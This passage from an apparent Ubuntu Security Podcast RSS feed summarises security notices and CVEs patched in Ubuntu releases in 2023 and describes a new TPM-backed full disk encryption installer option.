<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6343-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6343-1">USN-6343-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4273">CVE-2023-4273</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4194">CVE-2023-4194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4155">CVE-2023-4155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4128">CVE-2023-4128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40283">CVE-2023-40283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34319">CVE-2023-34319</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1206">CVE-2023-1206</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6344-1-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6344-1">USN-6344-1</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38429">CVE-2023-38429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38428">CVE-2023-38428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38426">CVE-2023-38426</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32258">CVE-2023-32258</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32257">CVE-2023-32257</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32252">CVE-2023-32252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32250">CVE-2023-32250</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32247">CVE-2023-32247</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2898">CVE-2023-2898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21255">CVE-2023-21255</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="tpm-backed-full-disk-encryption-is-coming-to-ubuntu--10-48">TPM-backed Full Disk Encryption is coming to Ubuntu (10:48)</h3>
<ul>
<li><a href="https://ubuntu.com/blog/tpm-backed-full-disk-encryption-is-coming-to-ubuntu">https://ubuntu.com/blog/tpm-backed-full-disk-encryption-is-coming-to-ubuntu</a></li>
<li>Ijlal Loutfi (Product Manager for Security Technologies)</li>
<li>Technical work has been led by Chris Coulson from our team - from early
research, design and implementation</li>
<li>Ubuntu has traditionally offered FDE via LUKS on-top of LVM since 6.06 - back
then it was via an alternate install image but in 12.10 got integrated into
the main install image</li>
<li>Uses a passphrase which is manually typed in at boot to unlock the disk</li>
<li>Not very useful in environments which don&rsquo;t have a user to do this -
ie. servers or IoT etc</li>
<li>Demand for an ability to have FDE without having to enter a passphrase -
particularly for IoT - so that if a device is stolen and the disk is removed
it cannot be compromised</li>
<li>Windows has long supported this via <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/">BitLocker</a> - uses a hardware component
called the Trusted Platform Module (TPM) to essentially store an encryption
key which is only made available if the machine is booting the expected
operating system under the expected BIOS etc</li>
<li>As I said earlier, this is a feature that has high demand in the IoT space, so
back in 2019 work was started to design and implement a similar solution for
Ubuntu Core</li>
<li>Debuted in <a href="https://ubuntu.com/core/docs/uc20/full-disk-encryption">Ubuntu Core 20 and has seen ongoing development through Ubuntu Core
22</a> and more since</li>
<li>To ensure that the expected + trusted BIOS and OS is running, use the TPM to
essentially store a chain of hashes of each component in the boot chain -
ie. BIOS, bootloader (shim + grub), kernel (including the kernel command-line)
and initrd etc</li>
<li>When the TPM is asked to unlock the encryption key, it will check that the
system is in the expected state by looking at the chain of hashes to make sure
they match the one that was used when the key was locked into the TPM in the
first place. If this is as expected, it will unlock the key, but if not
(ie. the system is booting some other OS or the disk is running on some other
machine etc) then the state won&rsquo;t match the disk won&rsquo;t be able to be unlocked</li>
<li>This has traditionally been quite hard to do on traditional Ubuntu and general
Linux systems since things like the initrd are composed on the local machine
(see <a href="https://manpages.ubuntu.com/manpages/focal/en/man8/update-initramfs.8.html">update-initramfs</a>) - and so they can&rsquo;t easily be signed and verified by
such a system.</li>
<li>But Ubuntu Core is a different beast, not subject to these same constraints -
built on snaps for more specialised use-cases - so for Ubuntu Core 20 the
kernel snap was updated to use <a href="https://github.com/uapi-group/specifications/blob/main/specs/unified_kernel_image.md">unified kernel images</a> which contain both the
kernel and initrd (plus some other components) into a single UEFI binary -
this allows them to be signed like existing kernel EFI binaries and hence
verified during the boot process and measured by the TPM to support this
use-case. Similarly, the gadget snap contains the bootloader and UEFI
configuration etc - so this can also be measured and verified at boot to
ensure the system is in the required state (ie. UEFI Secure Boot is enabled
etc).</li>
<li>Unlike Ubuntu Core, traditional or classic Ubuntu however uses debs for the
kernel and shim etc, and so is not easily amenable to this same solution -
also as mentioned above, components like the initrd and bootloader
configuration are generated locally and so can&rsquo;t easily be signed and hence
verified at boot</li>
<li>As such, to support this same use-case on traditional Ubuntu, the snap-based
approach was reused - in this model, instead of deb packages providing kernel
and shim + grub etc, snaps are used. As such, snapd is then also used to
manage the TPM as described above - ie. calculate the expected hashes when a
new kernel / bootloader is installed and re-seal the encryption key based on
this</li>
<li>This is then all provided via a new experimental option in the installer:</li>
</ul>
<figure><img src="/img/ubuntu-23.10-tpm-backed-fde-installer-1.png">
</figure>

<ul>
<li>Can list the recovery key once booted via:</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>snap recovery --show-keys
</span></span></code></pre></div><ul>
<li>Otherwise is intended to function like a regular Ubuntu install - but like
BitLocker on Windows, you won&rsquo;t have to enter a passphrase on boot but you
still get full disk encryption - and the kernel and bootloader are delivered
as snaps:</li>
</ul>
<p><img src="/img/ubuntu-23.10-tpm-backed-fde-installer-2.png" alt="">
<img src="/img/ubuntu-23.10-tpm-backed-fde-installer-3.png" alt=""></p>
<ul>
<li>Now you may ask, how is this different than existing solutions like Clevis?
<ul>
<li>Clevis only verifies the bootloader and kernel and hence can be bypassed
reasonably easily - in fact there was a recent blog from Pulse Security
describing this kind of thing
<a href="https://pulsesecurity.co.nz/advisories/tpm-luks-bypass">https://pulsesecurity.co.nz/advisories/tpm-luks-bypass</a></li>
<li>In this case, the systemd <code>emergency.service</code> unit is still enabled which
allows the usual boot checks to be bypassed</li>
<li>Chris considered this in the original design for Ubuntu Core and so this is
disabled</li>
<li>Crucially, when using something like Clevis, the initrd is not verified, so
an attacker can just replace the initrd with one of their own choosing to
subvert the usual trusted boot process as well</li>
<li>Interestingly the folks from <a href="https://linuxmatters.sh/11">Linux Matters</a> were recently talking about
TPM-backed FDE - mentioned systemd-cryptenroll - this can provide a more
comprehensive solution since you can choose to have it verify more of the
boot components BUT it still requires a lot of manual work to get running
and won&rsquo;t be as comprehensive in the end - also won&rsquo;t necessarily
auto-update when new kernels are installed etc</li>
</ul>
</li>
<li>Intended to be a holistic solution the provides robust protection against
various online and offline attacks, whilst providing strong guarantees that
things like Secure Boot is not bypassed <strong>and</strong> that the key from the TPM can&rsquo;t be
easily sniffed from the bus etc.</li>
<li>Thanks again to Chris for leading this work</li>
<li>Try it out, provide feedback</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E208.mp3" length="42011278" type="audio/mpeg" /><itunes:duration>1489</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 207
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-207/</link>
          <pubDate>Fri, 01 Sep 2023 23:16:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>fa7c259909d4aedaafb352324c11acd7e5ae859d0e9d5e50aeb0dce495f028b5adb009250d972ec95f904eaf2d67ca800172fb1a9166872bc7dde38e2a07e4df</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 207</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover reports of "fake" CVEs and their impact on the FOSS security
  ecosystem, plus we look at security updates for PHP, Fast DDS, JOSE for C/C++,
  the Linux kernel, AMD Microcode and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover reports of "fake" CVEs and their impact on the FOSS security
  ecosystem, plus we look at security updates for PHP, Fast DDS, JOSE for C/C++,
  the Linux kernel, AMD Microcode and more.
  </itunes:summary>
        <description>  This week we cover reports of "fake" CVEs and their impact on the FOSS security
  ecosystem, plus we look at security updates for PHP, Fast DDS, JOSE for C/C++,
  the Linux kernel, AMD Microcode and more.
  </description>
        <googleplay:description>  This week we cover reports of "fake" CVEs and their impact on the FOSS security
  ecosystem, plus we look at security updates for PHP, Fast DDS, JOSE for C/C++,
  the Linux kernel, AMD Microcode and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover reports of &ldquo;fake&rdquo; CVEs and their impact on the FOSS security
ecosystem, plus we look at security updates for PHP, Fast DDS, JOSE for C/C++,
the Linux kernel, AMD Microcode and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>83 unique CVEs addressed</p>
<h3 id="usn-6305-1-php-vulnerabilities--00-53">[<a href="https://ubuntu.com/security/notices/USN-6305-1">USN-6305-1</a>] PHP vulnerabilities (00:53)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3824">CVE-2023-3824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3823">CVE-2023-3823</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>One interesting issue in the handling of XML - PHP uses the libxml library for
XML handling which maintains global state for things like whether XML external
entities should be loaded. However PHP also uses ImageMagick for image
handling, which also uses libxml (for say SVG parsing etc). As such,
ImageMagick may end up configuring XML EE to be enabled, which then in turn
enables it for all of PHP and so allows XML EE attacks - which can then be
used to read and disclose the contents of local files.
<ul>
<li>Fixed by making PHPs use of libxml set a local context which explicitly
turns off XML EE handling rather than relying on the global context</li>
</ul>
</li>
<li>Stack buffer overflow when reading dirents from PHAR archives</li>
</ul>
<h3 id="usn-6306-1-fast-dds-vulnerabilities--02-28">[<a href="https://ubuntu.com/security/notices/USN-6306-1">USN-6306-1</a>] Fast DDS vulnerabilities (02:28)</h3>
<ul>
<li>7 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-39949">CVE-2023-39949</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39948">CVE-2023-39948</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39947">CVE-2023-39947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39946">CVE-2023-39946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39945">CVE-2023-39945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39534">CVE-2023-39534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38425">CVE-2021-38425</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>C++ implementation of DDS standard - pub-sub model for connecting software
components, used in various contexts like Adaptive AUTOSAR in the automotive
industry and others</li>
<li>DoS via traffic flood - fixed by implementing an exponential backoff for
authentication requests</li>
<li>various other DoS through different assertion failures, unhandled exceptions
and a couple heap buffer overflows for good measure too</li>
</ul>
<h3 id="usn-6307-1-jose-for-c-c-plus-plus-vulnerability--03-33">[<a href="https://ubuntu.com/security/notices/USN-6307-1">USN-6307-1</a>] JOSE for C/C++ vulnerability (03:33)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-37464">CVE-2023-37464</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>C library implementation of Javascript Object Signing and Encryption (JOSE)
standard</li>
<li>AES/GCM decryption would used the tag length value from the Authentication Tag
provided in the JWE header rather than the fixed length of 16 as
specified. Attacker could then provide a crafted JWE header with a shorter
authentication tag to trigger a buffer overflow on the receiver -&gt; crash -&gt;
DoS / info leak</li>
</ul>
<h3 id="usn-6308-1-libqb-vulnerability--04-25">[<a href="https://ubuntu.com/security/notices/USN-6308-1">USN-6308-1</a>] Libqb vulnerability (04:25)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-39976">CVE-2023-39976</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>tooling for generating man pages from Doxygen XML files</li>
<li>heap buffer overflow via an overly long input line when outputting certain log
messages</li>
</ul>
<h3 id="usn-6309-1-linux-kernel-vulnerabilities--04-48">[<a href="https://ubuntu.com/security/notices/USN-6309-1">USN-6309-1</a>] Linux kernel vulnerabilities (04:48)</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3567">CVE-2023-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2985">CVE-2023-2985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 GA in 16.04, HWE in 14.04</li>
<li>Mentioned some of these last week in <a href="/episode-205/#usn-6285-1-linux-kernel--oem--vulnerabilities--07-50">[USN-6285-1] Linux kernel (OEM) vulnerabilities</a></li>
<li>deadlocks in device mapper and DVB Core drivers; UAFs in HFS+ file-system
impl, virtual terminal drivers and netfilter network packet classifier; OOB
write in QFS network scheduler
<ul>
<li>DoS via CPU deadlock or crash; possible code execution for the UAFs / OOB
write</li>
</ul>
</li>
</ul>
<h3 id="usn-6311-1-linux-kernel-vulnerabilities--06-07">[<a href="https://ubuntu.com/security/notices/USN-6311-1">USN-6311-1</a>] Linux kernel vulnerabilities (06:07)</h3>
<ul>
<li>24 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35829">CVE-2023-35829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35828">CVE-2023-35828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35824">CVE-2023-35824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35823">CVE-2023-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-33288">CVE-2023-33288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3268">CVE-2023-3268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32248">CVE-2023-32248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23004">CVE-2023-23004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2235">CVE-2023-2235</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2163">CVE-2023-2163</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0597">CVE-2023-0597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48502">CVE-2022-48502</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 kernel variants for GCP and GKE</li>
</ul>
<h3 id="usn-6312-1-linux-kernel-vulnerabilities--06-22">[<a href="https://ubuntu.com/security/notices/USN-6312-1">USN-6312-1</a>] Linux kernel vulnerabilities (06:22)</h3>
<ul>
<li>16 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3111">CVE-2023-3111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1184">CVE-2022-1184</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0168">CVE-2022-0168</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36691">CVE-2020-36691</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 for GKE on 20.04 and IBM on 18.04</li>
</ul>
<h3 id="usn-6314-1-linux-kernel-vulnerabilities--06-33">[<a href="https://ubuntu.com/security/notices/USN-6314-1">USN-6314-1</a>] Linux kernel vulnerabilities (06:33)</h3>
<ul>
<li>16 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3111">CVE-2023-3111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1184">CVE-2022-1184</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0168">CVE-2022-0168</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36691">CVE-2020-36691</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 for IBM and BlueField (NVIDIA DPU family using ARM CPU cores from Mellanox
(now owned by NVIDIA))</li>
</ul>
<h3 id="usn-6315-1-linux-kernel-vulnerabilities--06-58">[<a href="https://ubuntu.com/security/notices/USN-6315-1">USN-6315-1</a>] Linux kernel vulnerabilities (06:58)</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4015">CVE-2023-4015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3995">CVE-2023-3995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3777">CVE-2023-3777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3610">CVE-2023-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21400">CVE-2023-21400</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 GA (GKE, NVIDIA, IBM, GCP, KVM, Oracle, AWS, LowLatency) for 22.04 and
HWE for 20.04 + some OEM specific kernels too</li>
<li>Zenbleed (<a href="/episode-204/#usn-6244-1-amd-microcode-vulnerability-05-57">[USN-6244-1] AMD Microcode vulnerability from Episode 204</a>) and
Gather Data Sampling (<a href="/episode-205/#usn-6286-1-intel-microcode-vulnerabilities--10-59">[USN-6286-1] Intel Microcode vulnerabilities from
Episode 205</a>)
<ul>
<li>Previously released microcode updates, now also shipping associated kernel
fixes - for Zenbleed this enables a workaround if the microcode is not
available (since for some CPUs this is only available as a BIOS update, not
via microcode in Ubuntu), whilst for GDS this simply provides kernel support
to help identify if the mitigation is in place or not - if no microcode is
available, can disable AVX entirely by setting <code>clearcpuid=avx</code> on the kernel
command-line (but this will have a decent performance impact)</li>
</ul>
</li>
</ul>
<h3 id="usn-6316-1-linux-kernel--oem--vulnerabilities--09-02">[<a href="https://ubuntu.com/security/notices/USN-6316-1">USN-6316-1</a>] Linux kernel (OEM) vulnerabilities (09:02)</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4015">CVE-2023-4015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3995">CVE-2023-3995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3777">CVE-2023-3777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.1 OEM on 22.04</li>
</ul>
<h3 id="usn-6317-1-linux-kernel-vulnerabilities--09-10">[<a href="https://ubuntu.com/security/notices/USN-6317-1">USN-6317-1</a>] Linux kernel vulnerabilities (09:10)</h3>
<ul>
<li>5 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 GA for 20.04 / HWE for 18.04</li>
</ul>
<h3 id="usn-6318-1-linux-kernel-vulnerabilities--09-20">[<a href="https://ubuntu.com/security/notices/USN-6318-1">USN-6318-1</a>] Linux kernel vulnerabilities (09:20)</h3>
<ul>
<li>10 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4015">CVE-2023-4015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3995">CVE-2023-3995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3777">CVE-2023-3777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3610">CVE-2023-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.2 23.04 GA, HWE for 22.04</li>
</ul>
